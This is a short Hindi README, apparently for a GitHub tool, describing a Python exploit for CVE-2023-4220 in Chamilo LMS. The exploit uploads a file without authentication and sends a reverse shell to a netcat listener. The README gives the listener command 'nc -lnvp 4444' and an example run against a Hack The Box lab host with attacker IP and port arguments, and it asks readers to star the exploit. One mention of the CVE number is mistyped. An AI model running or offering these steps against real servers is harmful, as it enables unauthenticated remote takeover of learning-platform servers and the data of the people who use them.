
Chamilo LMS में CVE-2023-4220 के लिए Python exploit जो एक फ़ाइल अपलोड करता है और netcat listener को एक unauthenticated reverse shell प्रदान करता है।
pip install requests
यह पायथन स्क्रिप्ट भेद्यता CVE-2023-422 का उपयोग करके सर्वर में एक फ़ाइल अपलोड करती है और उस फ़ाइल का उपयोग netcat लिसनर को रिवर्स शेल भेजने के लिए करती है, और यह सब बिना प्रमाणित हुए किया जा सकता है। हालाँकि, पायथन स्क्रिप्ट का सफलतापूर्वक उपयोग करने के लिए आपको निम्नलिखित चरणों का पालन करना होगा।
netcat लिसनर प्रारंभ करें:
nc -lnvp 4444
पायथन स्क्रिप्ट निष्पादित करना (उदाहरण):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
यदि निम्नलिखित एक्सप्लॉइट उपयोगी रहा हो तो कृपया एक स्टार छोड़ें :)